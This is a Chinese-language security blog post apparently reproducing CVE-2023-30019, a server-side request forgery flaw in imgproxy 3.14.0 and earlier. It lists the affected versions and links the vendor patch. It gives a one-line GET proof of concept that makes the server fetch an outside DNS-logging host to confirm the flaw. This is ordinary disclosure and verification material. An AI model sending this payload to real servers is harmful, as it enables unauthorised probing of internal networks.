Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

admin 2024年8月19日23:25:02评论35 views字数 491阅读1分38秒阅读模式
0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】
0x01漏洞介绍
imgproxy是imgproxy个人开发者的用于调整和转换远程镜像的快速且安全的独立服务器。

imgproxy 3.14.0版本及之前版本存在安全漏洞,由于缺乏对 imageURL 参数的清理,容易受到服务器端请求伪造 (SSRF) 的攻击。

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】
0x02影响版本

imgproxy <=3.14.0

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】
0x03漏洞复现
1.访问漏洞环境

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

2.对漏洞进行复现

POC (GET)

 /111/rs:fit:400:400:0:0/plain/http://dvxrhi.dnslog.cn

漏洞复现

GET请求,ndslog测试存在漏洞

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

3.nuclei测试(漏洞存在)

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】

Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/imgproxy/imgproxy/commit/1a9768a2c682e88820064aa3d9a05ea234ff3cc4

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月19日23:25:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】http://cn-sec.com/archives/1999135.html

发表评论

匿名网友 填写信息